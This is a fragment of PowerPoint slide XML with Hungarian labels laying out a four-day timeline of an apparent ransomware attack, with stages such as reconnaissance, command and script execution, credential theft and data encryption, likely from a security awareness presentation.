            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-137903" y="5167290"/>
              <a:ext cx="2953547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rPr>
                <a:t>Felderítés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094B1AAA-14F2-B7B6-61A9-CC4F96E70295}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8313629" y="6364051"/>
            <a:ext cx="4058233" cy="2912471"/>
            <a:chOff x="-690246" y="4186641"/>
            <a:chExt cx="4058233" cy="2912471"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="Flowchart: Connector 76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E909A86D-C432-84B4-EB3C-724AE656EB81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69506E30-3F15-B2AD-F9D8-C6C839D2CD6B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="79" idx="0"/>
              <a:endCxn id="77" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="1338871" y="4424878"/>
              <a:ext cx="1" cy="2197180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A78DE10-2833-7CB1-FCBB-872427F822D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-690246" y="6622058"/>
              <a:ext cx="4058233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</a:rPr>
                <a:t>Parancs és </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="hu-HU" sz="2500" dirty="0" err="1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</a:rPr>
                <a:t>szkript</a:t>
              </a:r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</a:rPr>
                <a:t> futtatása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E9D50F4-7BD2-903D-C005-D2896F90FA95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9165637" y="6357617"/>
            <a:ext cx="3547191" cy="2376533"/>
            <a:chOff x="-406200" y="4186641"/>
            <a:chExt cx="3547191" cy="2376533"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="84" name="Flowchart: Connector 83">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{365A95DF-8C98-87EF-FCAD-65BD0BF8669A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1195A7A1-5CF3-6015-9290-00B823543F33}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="86" idx="0"/>
              <a:endCxn id="84" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1338872" y="4424878"/>
              <a:ext cx="28524" cy="1276522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91C4087-31C1-6CC4-6445-2EEBAB25F1B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-406200" y="5701400"/>
              <a:ext cx="3547191" cy="86177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rPr>
                <a:t>Hozzáférési adatok ellopása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33D0DF3-0411-0518-D11E-417F28DCB19D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12981125" y="6349734"/>
            <a:ext cx="2953547" cy="1945383"/>
            <a:chOff x="-137903" y="4186641"/>
            <a:chExt cx="2953547" cy="1945383"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="88" name="Flowchart: Connector 87">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30DCE9FC-7A48-C86D-82E3-66010BC35E99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62E68D52-BEE6-9743-87AF-576BBE770174}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="90" idx="0"/>
              <a:endCxn id="88" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="1338871" y="4424878"/>
              <a:ext cx="1" cy="1230092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4A70DB6A-3F28-9C81-FD43-18A9F4BF20E5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-137903" y="5654970"/>
              <a:ext cx="2953547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rPr>
                <a:t>Adatok titkosítása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pic>
        <p:nvPicPr>
          <p:cNvPr id="71" name="Kép 7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06712" y="0"/>
            <a:ext cx="1581288" cy="41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468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A0258-D219-A95B-D8C4-3387DC74D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91">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55D6A8CF-E9ED-74CF-9BCC-9730861AE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8749" y="1751264"/>
            <a:ext cx="2730501" cy="27305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ECD4206-D7C9-4C09-4788-FA0A1A279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300" y="318451"/>
            <a:ext cx="16535400" cy="1431256"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>A végzet idővonala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E9882A6-4B80-D694-7A52-8634DC117735}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1338870" y="6476999"/>
            <a:ext cx="16072830" cy="266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CBF16C85-50B7-79F1-A57B-D6167D692C11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17292582" y="6357881"/>
            <a:ext cx="238237" cy="238237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FE4ECAFD-E17F-34ED-A32D-1C7AABD6CE40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219753" y="6357880"/>
            <a:ext cx="238237" cy="238237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CDBB56E-EE12-17FB-40BF-7F1FB481AEB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="85610" y="6596117"/>
            <a:ext cx="2506523" cy="338554"/>
            <a:chOff x="190403" y="4233930"/>
            <a:chExt cx="2506523" cy="338554"/>
          </a:xfrm>
        </p:grpSpPr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857CDD27-9E50-0950-7CA8-6F8C9BB80EC3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="70" idx="0"/>
              <a:endCxn id="5" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1443665" y="4233930"/>
              <a:ext cx="0" cy="50800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147E0D2-9544-53A6-43F6-50C580F91701}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="190403" y="4233930"/>
              <a:ext cx="2506523" cy="3385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1600" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Kezdet</a:t>
              </a:r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52B630B6-5B9D-F063-48C1-CB67CA791D78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1338870" y="5280807"/>
            <a:ext cx="16072830" cy="1199855"/>
            <a:chOff x="1338870" y="4147713"/>
            <a:chExt cx="16072830" cy="2332949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20CF4593-65BA-FFC1-7C6F-F058EF156DCB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1338870" y="4150094"/>
              <a:ext cx="4076934" cy="2330568"/>
              <a:chOff x="2026444" y="3572551"/>
              <a:chExt cx="2597414" cy="2330568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08AF72A4-2B65-B72D-3FB8-B54A87DC1F67}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="2026444" y="3572551"/>
                <a:ext cx="2552227" cy="2330568"/>
                <a:chOff x="39904" y="2897813"/>
                <a:chExt cx="2552227" cy="2330568"/>
              </a:xfrm>
            </p:grpSpPr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B1315C23-D73D-70F8-3DD7-C5147B9F5CE3}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks/>
                  <a:stCxn id="20" idx="2"/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipH="1">
                  <a:off x="39904" y="3825378"/>
                  <a:ext cx="1298966" cy="1403003"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln w="25400" cap="rnd">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:alpha val="37325"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="sysDot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7ABAE00-BCAD-28BE-7534-6A966A4FFE02}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="85608" y="2897813"/>
                  <a:ext cx="2506523" cy="927565"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom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hu-HU" sz="2500" dirty="0" smtClean="0">
                      <a:solidFill>
                        <a:schemeClr val="bg1"/>
                      </a:solidFill>
                      <a:latin typeface="+mj-lt"/>
                    </a:rPr>
                    <a:t>Első nap</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" sz="25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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="93" name="Straight Arrow Connector 92">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E458166-2F61-172F-8400-39E91D264DD7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="20" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3325410" y="4500116"/>
                <a:ext cx="1298448" cy="1399031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EC4E03E6-E8D8-76BD-863B-D64943A4E77C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5336825" y="4150094"/>
              <a:ext cx="4076934" cy="2330568"/>
              <a:chOff x="2026444" y="3572551"/>
              <a:chExt cx="2597414" cy="2330568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6A5B5F78-D0F5-F30E-F63D-D7607DE89577}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="2026444" y="3572551"/>
                <a:ext cx="2552227" cy="2330568"/>
                <a:chOff x="39904" y="2897813"/>
                <a:chExt cx="2552227" cy="2330568"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="103" name="Straight Arrow Connector 102">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B32E7895-D028-72BF-1AEE-C3A2471F0CA3}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks/>
                  <a:stCxn id="104" idx="2"/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipH="1">
                  <a:off x="39904" y="3825378"/>
                  <a:ext cx="1298966" cy="1403003"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln w="25400" cap="rnd">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:alpha val="37325"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="sysDot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B8457363-9699-2FF6-6091-EEB4713AD28C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="85608" y="2897813"/>
                  <a:ext cx="2506523" cy="927565"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom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hu-HU" sz="2500" dirty="0" smtClean="0">
                      <a:solidFill>
                        <a:schemeClr val="bg1"/>
                      </a:solidFill>
                      <a:latin typeface="+mj-lt"/>
                    </a:rPr>
                    <a:t>Második nap</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" sz="25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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="102" name="Straight Arrow Connector 101">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54AAD779-2923-FE82-002B-005CFCD98636}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="104" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3325410" y="4500116"/>
                <a:ext cx="1298448" cy="1399031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764F31BA-E210-1F7A-F349-2EDC392434B0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9335593" y="4147713"/>
              <a:ext cx="4076934" cy="2330568"/>
              <a:chOff x="2026444" y="3572551"/>
              <a:chExt cx="2597414" cy="2330568"/>
            </a:xfrm>
          </p:grpSpPr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2D949F8A-FA2B-83C3-9C9D-E33640ADD32A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="2026444" y="3572551"/>
                <a:ext cx="2552227" cy="2330568"/>
                <a:chOff x="39904" y="2897813"/>
                <a:chExt cx="2552227" cy="2330568"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="110" name="Straight Arrow Connector 109">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17D874BA-5A77-0338-0FD6-34351EA12BBC}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks/>
                  <a:stCxn id="111" idx="2"/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipH="1">
                  <a:off x="39904" y="3825378"/>
                  <a:ext cx="1298966" cy="1403003"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln w="25400" cap="rnd">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:alpha val="37325"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="sysDot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C317341D-5B43-4429-77E1-9B4B0A390508}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="85608" y="2897813"/>
                  <a:ext cx="2506523" cy="927565"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom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hu-HU" sz="2500" dirty="0" smtClean="0">
                      <a:solidFill>
                        <a:schemeClr val="bg1"/>
                      </a:solidFill>
                      <a:latin typeface="+mj-lt"/>
                    </a:rPr>
                    <a:t>Harmadik nap</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" sz="25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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="109" name="Straight Arrow Connector 108">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{316FB8ED-E110-5BC3-037E-ACF89F308C30}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="111" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3325410" y="4500116"/>
                <a:ext cx="1298448" cy="1399031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C2706873-0806-4304-1ED7-2B20C6820E8C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="13334766" y="4147713"/>
              <a:ext cx="4076934" cy="2330568"/>
              <a:chOff x="2026444" y="3572551"/>
              <a:chExt cx="2597414" cy="2330568"/>
            </a:xfrm>
          </p:grpSpPr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3C78C87B-5B09-775D-1657-64911DE62974}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="2026444" y="3572551"/>
                <a:ext cx="2552227" cy="2330568"/>
                <a:chOff x="39904" y="2897813"/>
                <a:chExt cx="2552227" cy="2330568"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="115" name="Straight Arrow Connector 114">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE8F39F0-7F3F-F376-A29F-0CD37B4BFCF1}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks/>
                  <a:stCxn id="116" idx="2"/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipH="1">
                  <a:off x="39904" y="3825378"/>
                  <a:ext cx="1298966" cy="1403003"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln w="25400" cap="rnd">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:alpha val="37325"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="sysDot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2D1EAB6F-9862-BB21-344B-8F35D284BAAF}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="85608" y="2897813"/>
                  <a:ext cx="2506523" cy="927565"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" rtlCol="0" anchor="b">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr"/>
                  <a:r>
                    <a:rPr lang="hu-HU" sz="2500" dirty="0" smtClean="0">
                      <a:solidFill>
                        <a:schemeClr val="bg1"/>
                      </a:solidFill>
                      <a:latin typeface="+mj-lt"/>
                    </a:rPr>
                    <a:t>Negyedik nap</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" sz="25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07DBD8B7-8C92-CF21-BF87-53B24A912DBD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="116" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3325410" y="4500116"/>
                <a:ext cx="1298448" cy="1399031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BA9DAA3F-489F-B0C7-0FDB-D00CC1682598}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11180607" y="3996076"/>
            <a:ext cx="6572923" cy="2600041"/>
            <a:chOff x="11180607" y="3996076"/>
            <a:chExt cx="6572923" cy="2600041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703D3FEA-1305-FF8B-F227-18414FFDBA5D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="11180607" y="3996076"/>
              <a:ext cx="6572923" cy="2600041"/>
              <a:chOff x="-1947594" y="2662576"/>
              <a:chExt cx="6572923" cy="2600041"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="133" name="Flowchart: Connector 132">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE83DE67-6E69-9145-83D1-A6A0FCDBD218}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1219753" y="5024380"/>
                <a:ext cx="238237" cy="238237"/>
              </a:xfrm>
              <a:prstGeom prst="flowChartConnector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4" name="Straight Arrow Connector 133">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95AC377D-2EF0-F621-EA52-EF08BB27D927}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="135" idx="2"/>
                <a:endCxn id="133" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1338868" y="4047571"/>
                <a:ext cx="4" cy="976809"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="25400" cap="rnd">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="37325"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:prstDash val="sysDot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932EC150-57E8-BB23-75D7-47AC5D84353C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-1947594" y="2662576"/>
                <a:ext cx="6572923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bg1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-lt"/>
                  </a:rPr>
                  <a:t/>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="2800" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-lt"/>
                  </a:rPr>
                </a:br>
                <a:endParaRPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:endParaRPr lang="en-US" sz="28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pic>
          <p:nvPicPr>
            <p:cNvPr id="132" name="Picture 131" descr="A letter f in orange letters&#10;&#10;AI-generated content may be incorrect.">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86E60BCA-E47F-6F31-7BFC-6D7A772BB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64226" y="4114323"/>
              <a:ext cx="6405683" cy="1170694"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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A8503ED1-D5C3-AC1F-C445-782FFF36E579}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12990293" y="6349734"/>
            <a:ext cx="2953547" cy="1515943"/>
            <a:chOff x="-128735" y="4186641"/>
            <a:chExt cx="2953547" cy="1515943"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="137" name="Flowchart: Connector 136">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86DC69E2-4620-5B89-E559-B1FDB8DD3B14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9F9D22F8-C024-611F-44BC-5BA2B7D76B88}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="139" idx="0"/>
              <a:endCxn id="137" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1338872" y="4424878"/>
              <a:ext cx="9167" cy="800652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DC613ED7-757F-36FA-C7D8-B6CE5349C6FC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-128735" y="5225530"/>
              <a:ext cx="2953547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rPr>
                <a:t>Adatok titkosítása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9B9F7E44-09FF-A6A3-2B8E-23E82E973AFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219753" y="6357880"/>
            <a:ext cx="2856071" cy="1507797"/>
            <a:chOff x="-93064" y="4186641"/>
            <a:chExt cx="2856071" cy="1507797"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="141" name="Flowchart: Connector 140">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B91A269-2C28-4AE4-7C0F-D15B7F45DE21}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219753" y="4186641"/>
              <a:ext cx="238237" cy="238237"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartConnector">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="100000">
                  <a:srgbClr val="C00000"/>
                </a:gs>
                <a:gs pos="57000">
                  <a:srgbClr val="FFB521"/>
                </a:gs>
                <a:gs pos="20000">
                  <a:srgbClr val="EA6D0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42" name="Straight Arrow Connector 141">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D30BCB1A-F24D-7D9C-B12A-D7045CB6162F}"/>
                </a:ext>
